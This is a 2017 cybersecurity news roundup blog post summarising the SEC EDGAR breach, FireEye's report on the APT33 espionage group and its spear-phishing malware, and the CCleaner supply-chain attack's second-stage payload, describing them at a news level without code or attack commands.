Ready to Start Your Career?
September 22, 2017
UNM4SK3D: SEC, APT33, and CCleaner
September 22, 2017
#hackedIt seems that word of new breaches have been released almost daily as of late. The latest, coming on the back on the devastating Equifax breach, is news that the Securities and Exchange Commission (SEC) was hacked last year. Gulp.The SEC is the top U.S. market's regulator. Their official website states, "The mission of the U.S. Securities and Exchange Commission is to protect investors, maintain fair, orderly, and efficient markets, and facilitate capital formation." With news of this recent breach, it seems that mission failed, as hackers were able to gain access to the financial document filing system and may have illegally profited from the stolen information. News reports indicate that no personal data was compromised, but the incident heightens the alarm of incompetent security in critical, large organizations. In months after the 2016 breach was detected, "the Government Accountability Office found that the SEC did not always use encryption, used unsupported software, and failed to implement well-tuned firewalls and other key security features while going about its business," Reuters reported.It seems as though the SEC learned last month that a "previously detected 2016 cyber attack, which exploited a 'software vulnerability' in the online EDGAR public-company filing system, may have provided the basis for illicit gain through trading." To clarify, EDGAR stands for 'Electronic Data Gathering, Analysis, and Retrieval,' is an online filing system where companies submit their financial filings. EDGAR processes around 1.7 million electronic filings a year. Within the database are corporate disclosures, ranging from "quarterly earnings to sensitive and confidential information on mergers and acquisitions, which could be used for insider-trading or manipulating U.S. equity markets." The SEC flaw was allegedly promptly patched, but only after the initial hack took place. In a statement, the SEC said it is still investigating the incident, cooperating with law enforcement, and has been tracking individuals who they believe placed false SEC filings on their EDGAR system.Meanwhile, Equifax just released they suffered another breach in March 2017, although the details are still unclear.
Notwithstanding our efforts to protect our systems and manage cybersecurity risk, in certain cases cyber threat actors have managed to access or misuse our systems. We believe the intrusion did not result in unauthorized access to personally identifiable information, jeopardize the operations of the Commission, or result in systemic risk. -SEC Chairman Jay ClaytonRegardless of the size of your organization, there are valuable lessons to be learned. Read 'Best Tools for Business Owners' for insight.
#cyberespionageOne small victory in the cyber world- researchers at FireEye have uncovered a cyber espionage group, 'Advanced Persistent Threat 33' (APT33) who target aerospace, defense and energy companies in the United States, Saudi Arabia and South Korea.According to the latest report, APT33's attack, 'DropShot,' is connected to the infamous 'StoneDrill' wiper malware. The malware is delivered using spear phishing campaigns that includes advertisements for jobs at Saudi Arabian aviation companies and Western organizations, researchers said. 'StoneDrill' was initially identified by Kaspersky Labs as previously targeting a European petroleum company and is believed to be an updated version of 'Shamoon 2' malware. Reports indicate APT33 has been active since 2013, but it's unknown by either research group if the hackers behind 'Shamoon' and 'StoneDrill' are the same, or are simply aligned in interests and regions in which they target.It appears the goal of the attacks is to increase Iran’s own aviation capabilities, gather Saudi-related military intelligence for Iran and help Iranian petrochemical firms gain a competitive advantage over Saudi Arabian companies. That being said, evidence indicates this malware may be tied to the Iranian evidence. The links in the phishing emails included spoofed domains for firms Boeing, Alsalam Aircraft Company, and Northrop Grumman Aviation Arabia.
The .hta files contained job descriptions and links to legitimate job postings on popular employment websites that would be relevant to the targeted individual. Unbeknownst to the user, the .hta file also contained embedded code that automatically downloaded a custom APT33 backdoor (TurnedUp). -FireEye ResearchersThe energy sector has been a major target for a variety of espionage groups. Learn more in this recent edition of 'UNM4SK3D.'
#malwareFor those affected by the CCleaner malware from earlier in the week who thought they were in the clear, think again. It seems as though 20 major international technology companies were hit with a second-stage payload.In the initial hack, a group of unknown hackers hijacked CCleaner's download server to distribute a malicious version of the popular system optimization software. Researchers who investigated this malware which hit 2.3 million users, assured the public "there's no second stage malware used in the massive attack and affected users can simply update their version in order to get rid of the malicious software." Well, they were wrong. In an analysis of the hackers' command-and-control (C2) server by Cisco's Talos Group, evidence of a second payload (GeeSetup_x86.dll, a lightweight backdoor module) that was delivered to a specific list of computers based on local domain names was found.Those researchers uncovered a list of nearly 700,000 backdoored machines infected by the CCleaner malware. The Hacker News reported that "the attack was designed to find computers inside the networks of the major technology firms and deliver the secondary payload." Targeted companies include: Google, Microsoft, Samsung, Akamai, and VMware. Researchers have recommended that targeted companies fully restore their systems from backup versions.
These findings also support and reinforce our previous recommendation that those impacted by this supply chain attack should not simply remove the affected version of CCleaner or update to the latest version, but should restore from backups or reimage systems to ensure that they completely remove not only the backdoored version of CCleaner but also any other malware that may be resident on the system. -Talos Group researchersWant more insight on CCleaner? Get this blog from Tripwire for details.